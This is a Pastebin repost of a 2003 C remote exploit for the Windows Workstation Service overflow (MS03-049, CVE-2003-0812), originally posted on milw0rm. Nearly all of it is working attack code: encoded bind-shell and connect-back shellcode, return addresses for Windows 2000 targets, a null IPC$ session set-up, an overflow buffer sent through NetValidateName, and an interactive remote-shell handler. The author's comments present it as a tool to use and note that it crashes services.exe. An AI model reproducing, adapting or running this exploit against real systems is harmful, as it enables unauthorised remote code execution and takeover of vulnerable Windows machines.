Advertisement
FlyFar

Microsoft Windows - Workstation Service WKSSVC Remote (MS03-049) - CVE-2003-0812

Jan 30th, 2024
2,680
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 12.62 KB | Cybersecurity | 0 0
  1. /*
  2.  *  Author: snooq
  3.  *  Date: 14 November 2003  
  4.  *
  5.  *  +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++
  6.  *
  7.  *  This is just slightly better than the one I posted to
  8.  *  packetstorm....
  9.  *
  10.  *  The public version will crash 'services.exe' immediately
  11.  *  while this one crash it only when u exit from shell....
  12.  *
  13.  *  I'm still trying to figure out a way to avoid the 'crash'
  14.  *  all together... any ideas????
  15.  *
  16.  *  Let me know if you hav trouble compiling this shit...
  17.  *  I hope this could be a good e.g for u to try Win32
  18.  *  exploitation..
  19.  *
  20.  *  This code is crappy... if u know of a better way of doing
  21.  *  things... pls tell me.......
  22.  *
  23.  *  Otherwise, if you guys r keen... I'll be more than happy
  24.  *  to go thru this in details wif u all... Meanwhile..enjoy!
  25.  *
  26.  *  +++++++++++++++++++++++++++++++++++++++++++++++++
  27.  */
  28.  
  29. #pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib")
  30. #pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib")
  31. #pragma comment (linker,"/NODEFAULTLIB:libcmt.lib")
  32. #pragma comment (linker,"/NODEFAULTLIB:libcd.lib")
  33. #pragma comment (lib,"ws2_32")
  34. #pragma comment (lib,"msvcrt")
  35. #pragma comment (lib,"mpr")
  36. #pragma warning (disable:4013)
  37.  
  38. #include <winsock2.h>
  39. #include <windows.h>
  40. #include <process.h>
  41. #include <stdlib.h>
  42. #include <stdio.h>
  43. #include <lm.h>
  44.  
  45. #define NOP 0x90
  46. #define PORT    24876
  47. #define KEY 0x99999999
  48.  
  49. #define ALIGN       1   // Between 0 ~ 3
  50. #define TARGET      1
  51. #define INTERVAL    3
  52. #define TIME_OUT    20
  53. #define PORT_OFFSET_1   198
  54. #define PORT_OFFSET_2   193
  55. #define IP_OFFSET   186
  56. #define SC_OFFSET   20  // Gap for some NOPs...
  57. #define RET_SIZE    2026    // Big enuff to take EIP... ;)
  58.  
  59. #define SC_SIZE_1   sizeof(bindport)
  60. #define SC_SIZE_2   sizeof(connback)
  61.  
  62. #define BSIZE   2600
  63. #define SSIZE   128
  64.  
  65. extern char getopt(int,char **,char*);
  66. extern char *optarg;
  67. static int alarm_fired=0;
  68.  
  69. HMODULE hMod;
  70. FARPROC fxn;
  71. HANDLE t1, t2;
  72.  
  73. char buff[BSIZE];
  74.  
  75. struct {
  76.     char *os;
  77.     long jmpesp;
  78.     char *dll;
  79. }
  80.  
  81. targets[] = {
  82.     {
  83.         "Window 2000 (en) SP4",
  84.         0x77e14c29,
  85.         "user32.dll 5.0.2195.6688"
  86.     },
  87.     {
  88.         "Window 2000 (en) SP1",
  89.         0x77e3cb4c,
  90.         "user32.dll 5.0.2195.1600"
  91.     },
  92.     {
  93.         "For debugging only",
  94.         0x41424344,
  95.         "dummy.dll 5.0.2195.1600"
  96.     }
  97. }, v;
  98.  
  99. /*
  100.  * HD Moore's shellcode..... ;)
  101.  */
  102.  
  103. char bindport[]=
  104.     "\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99"
  105.     "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
  106.     "\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f"
  107.     "\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65"
  108.     "\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a"
  109.     "\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10"
  110.     "\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85"
  111.     "\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0"
  112.     "\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f"
  113.     "\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17"
  114.     "\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66"
  115.     "\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8"
  116.     "\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc"
  117.     "\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18"
  118.     "\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f"
  119.     "\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5"
  120.     "\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0"
  121.     "\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66"
  122.     "\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce"
  123.     "\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81"
  124.     "\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65"
  125.     "\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5"
  126.     "\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85"
  127.     "\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4"
  128.     "\xc2\x5b\x91\x99";
  129.  
  130. char connback[]=
  131.     "\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99"
  132.     "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
  133.     "\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33"
  134.     "\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b"
  135.     "\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7"
  136.     "\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd"
  137.     "\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce"
  138.     "\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3"
  139.     "\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71"
  140.     "\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09"
  141.     "\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce"
  142.     "\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b"
  143.     "\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd"
  144.     "\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67"
  145.     "\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14"
  146.     "\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99"
  147.     "\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd"
  148.     "\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12"
  149.     "\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72"
  150.     "\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79"
  151.     "\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12"
  152.     "\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12"
  153.     "\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09";
  154.  
  155. void err_exit(char *s) {
  156.     printf("%s\n",s);
  157.     exit(0);
  158. }
  159.  
  160. /*
  161.  * Ripped from TESO code and modifed by ey4s for win32
  162.  * and... lamer quoted it wholesale here..... =p
  163.  */
  164.  
  165. void doshell(int sock) {
  166.     int l;
  167.     char buf[512];
  168.     struct timeval time;
  169.     unsigned long ul[2];
  170.  
  171.     time.tv_sec=1;
  172.     time.tv_usec=0;
  173.  
  174.     while (1) {
  175.         ul[0]=1;
  176.         ul[1]=sock;
  177.  
  178.         l=select(0,(fd_set *)&ul,NULL,NULL,&time);
  179.         if(l==1) {
  180.             l=recv(sock,buf,sizeof(buf),0);
  181.             if (l<=0) {
  182.                 err_exit("-> Connection closed...\n");
  183.             }
  184.             l=write(1,buf,l);
  185.             if (l<=0) {
  186.                 err_exit("-> Connection closed...\n");
  187.             }
  188.         }
  189.         else {
  190.             l=read(0,buf,sizeof(buf));
  191.             if (l<=0) {
  192.                 err_exit("-> Connection closed...\n");
  193.             }
  194.             l=send(sock,buf,l,0);
  195.             if (l<=0) {
  196.                 err_exit("-> Connection closed...\n");
  197.             }
  198.         }
  199.     }
  200. }
  201.  
  202. void changeip(char *ip) {
  203.     char *ptr;
  204.     ptr=connback+IP_OFFSET;
  205.     /* Assume Little-Endianess.... */
  206.     *((long *)ptr)=inet_addr(ip)^KEY;
  207. }
  208.  
  209. void changeport(char *code, int port, int offset) {
  210.     char *ptr;
  211.     ptr=code+offset;
  212.     port^=KEY;
  213.     /* Assume Little-Endianess.... */
  214.     *ptr++=(char)((port>>8)&0xff);
  215.     *ptr++=(char)(port&0xff);
  216. }
  217.  
  218. void banner() {
  219.     printf("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n\n");
  220. }
  221.  
  222. void usage(char *s) {
  223.     banner();
  224.     printf("Usage: %s [options]\n",s);
  225.     printf("\t-r\tSize of 'return addresses'\n");
  226.     printf("\t-a\tAlignment size [0~3]\n");
  227.     printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n");
  228.     printf("\t\tPort for shell to connect back (in 'listening' mode)\n");
  229.     printf("\t-s\tShellcode offset from the return address\n");
  230.     printf("\t-h\tTarget's IP\n");
  231.     printf("\t-t\tTarget types. ( -H for more info )\n");
  232.     printf("\t-H\tShow list of possible targets\n");
  233.     printf("\t-l\tListening for shell connecting\n");
  234.     printf("\t\tback to port specified by '-p' switch\n");
  235.     printf("\t-i\tIP for shell to connect back\n");
  236.     printf("\t-I\tTime interval between each trial ('connecting' mode only)\n");
  237.     printf("\t-T\tTime out (in number of seconds)\n\n");
  238.     printf("\tNotes:\n\t======\n\t'-h' is mandatory\n");
  239.     printf("\t'-i' is mandatory if '-l' is specified\n\n");
  240.     exit(0);
  241. }
  242.  
  243. void showtargets() {
  244.     int i;
  245.     banner();
  246.     printf("Possible targets are:\n");
  247.     printf("=====================\n");
  248.     for (i=0;i<sizeof(targets)/sizeof(v);i++) {
  249.         printf("%d) %s",i+1,targets[i].os);
  250.         printf(" --> 0x%08x (%s)\n",targets[i].jmpesp,targets[i].dll);
  251.     }
  252.     exit(0);
  253. }
  254.  
  255. void sendstr(char *host) {
  256.  
  257.     WCHAR wStr[128];
  258.     char ipc[128], hStr[128];
  259.  
  260.     DWORD ret;
  261.     NETRESOURCE NET;
  262.  
  263.     hMod=LoadLibrary("netapi32.dll");
  264.     fxn=GetProcAddress(hMod,"NetValidateName");
  265.  
  266.     _snprintf(ipc,127,"\\\\%s\\ipc$",host);
  267.     _snprintf(hStr,127,"\\\\%s",host);
  268.     MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));
  269.  
  270.     NET.lpLocalName = NULL;
  271.     NET.lpProvider = NULL;
  272.     NET.dwType = RESOURCETYPE_ANY;
  273.     NET.lpRemoteName = (char*)&ipc;
  274.  
  275.     printf("-> Setting up $IPC session...(aka 'null session')\n");
  276.     ret=WNetAddConnection2(&NET,"","",0);
  277.  
  278.     if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); }
  279.     else printf("-> IPC$ session setup successfully...\n");
  280.  
  281.     printf("-> Sending exploit string...\n");
  282.  
  283.     ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);
  284.  
  285. }
  286.  
  287. VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) {
  288.     err_exit("-> I give up...dude.....");
  289. }
  290.  
  291. void setalarm(int timeout) {
  292.  
  293.     MSG msg = { 0, 0, 0, 0 };
  294.     SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell);
  295.  
  296.     while(!alarm_fired) {
  297.         if (GetMessage(&msg, 0, 0, 0) ) {
  298.             if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n");
  299.             DispatchMessage(&msg);
  300.         }
  301.     }
  302.  
  303. }
  304.  
  305. void resetalarm() {
  306.     if (TerminateThread(t2,0)==0) {
  307.         err_exit("-> Failed to reset alarm...");
  308.     }
  309.     if (TerminateThread(t1,0)==0) {
  310.         err_exit("-> Failed to kill the 'sending' thread...");
  311.     }
  312. }
  313.  
  314. void do_send(char *host,int timeout) {
  315.     t1=(HANDLE)_beginthread(sendstr,0,host);
  316.     if (t1==0) { err_exit("-> Failed to send exploit string..."); }
  317.     t2=(HANDLE)_beginthread(setalarm,0,timeout);
  318.     if (t2==0) { err_exit("-> Failed to set alarm clock..."); }
  319. }
  320.  
  321. int main(int argc, char *argv[]) {
  322.  
  323.     char opt;
  324.     char *host, *ptr, *ip="";
  325.     struct sockaddr_in sockadd;
  326.     int i, i_len, ok=0, mode=0, flag=0;
  327.     int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
  328.     int target=TARGET, scsize=SC_SIZE_1, port=PORT;
  329.     int timeout=TIME_OUT, interval=INTERVAL;
  330.     long retaddr;
  331.  
  332.     WSADATA wsd;
  333.     SOCKET s1, s2;
  334.  
  335.     if (argc<2) { usage(argv[0]); }
  336.  
  337.     while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
  338.         switch(opt) {
  339.             case 'a':
  340.             align=atoi(optarg);
  341.             break;
  342.  
  343.             case 'I':
  344.             interval=atoi(optarg);
  345.             break;
  346.  
  347.             case 'T':
  348.             timeout=atoi(optarg);
  349.             break;
  350.  
  351.             case 't':
  352.             target=atoi(optarg);
  353.             retaddr=targets[target-1].jmpesp;
  354.             break;
  355.  
  356.             case 'i':
  357.             ip=optarg;
  358.             changeip(ip);
  359.             break;
  360.  
  361.             case 'l':
  362.             mode=1;
  363.             scsize=SC_SIZE_2;
  364.             break;
  365.  
  366.             case 'r':
  367.             retsize=atoi(optarg);
  368.             break;
  369.  
  370.             case 's':
  371.             sc_offset=atoi(optarg);
  372.             break;
  373.            
  374.             case 'h':
  375.             ok=1;
  376.             host=optarg;
  377.             sockadd.sin_addr.s_addr=inet_addr(optarg);
  378.             break;
  379.  
  380.             case 'p':
  381.             port=atoi(optarg);
  382.             break;
  383.  
  384.             case 'H':
  385.             showtargets();
  386.             break;
  387.  
  388.             default:
  389.             usage(argv[0]);
  390.             break;
  391.         }
  392.     }
  393.  
  394.     if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }
  395.  
  396.     memset(buff,NOP,BSIZE);
  397.  
  398.     ptr=buff+align;
  399.     for(i=0;i<retsize;i+=4) {
  400.         *((long *)ptr)=retaddr;
  401.         ptr+=4;
  402.     }
  403.  
  404.     if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
  405.         err_exit("-> WSAStartup error....");
  406.     }
  407.  
  408.     if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
  409.         err_exit("-> socket() error...");
  410.     }
  411.     sockadd.sin_family=AF_INET;
  412.     sockadd.sin_port=htons((SHORT)port);
  413.  
  414.     ptr=buff+retsize+sc_offset;
  415.  
  416.     if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");
  417.  
  418.     banner();
  419.  
  420.     if (mode) {
  421.  
  422.         printf("-> 'Listening' mode...( port: %d )\n",port);
  423.  
  424.         changeport(connback, port, PORT_OFFSET_2);
  425.         for(i=0;i<scsize;i++) { *ptr++=connback[i]; }
  426.  
  427.         do_send(host,timeout);
  428.         Sleep(1000);
  429.  
  430.         sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
  431.         i_len=sizeof(sockadd);
  432.  
  433.         if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
  434.             err_exit("-> bind() error");
  435.         }
  436.  
  437.         if (listen(s1,0)<0) {
  438.             err_exit("-> listen() error");
  439.         }
  440.  
  441.         printf("-> Waiting for connection...\n");
  442.  
  443.         s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);
  444.  
  445.         if (s2<0) {
  446.             err_exit("-> accept() error");
  447.         }
  448.  
  449.         printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));
  450.  
  451.         resetalarm();
  452.         doshell(s2);
  453.  
  454.     }
  455.     else {
  456.  
  457.         printf("-> 'Connecting' mode...\n",port);
  458.  
  459.         changeport(bindport, port, PORT_OFFSET_1);
  460.         for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }
  461.  
  462.         do_send(host,timeout);
  463.         Sleep(1000);
  464.  
  465.         printf("-> Will try connecting to shell now....\n");
  466.  
  467.         i=0;  
  468.         while(!flag) {
  469.             Sleep(interval*1000);
  470.             if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
  471.                 printf("-> Trial #%d....\n",i++);
  472.             }
  473.             else { flag=1; }
  474.         }
  475.  
  476.         printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);
  477.  
  478.         resetalarm();
  479.         doshell(s1);
  480.  
  481.     }
  482.  
  483.     return 0;
  484.  
  485. }
  486.  
  487. // milw0rm.com [2003-11-14]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement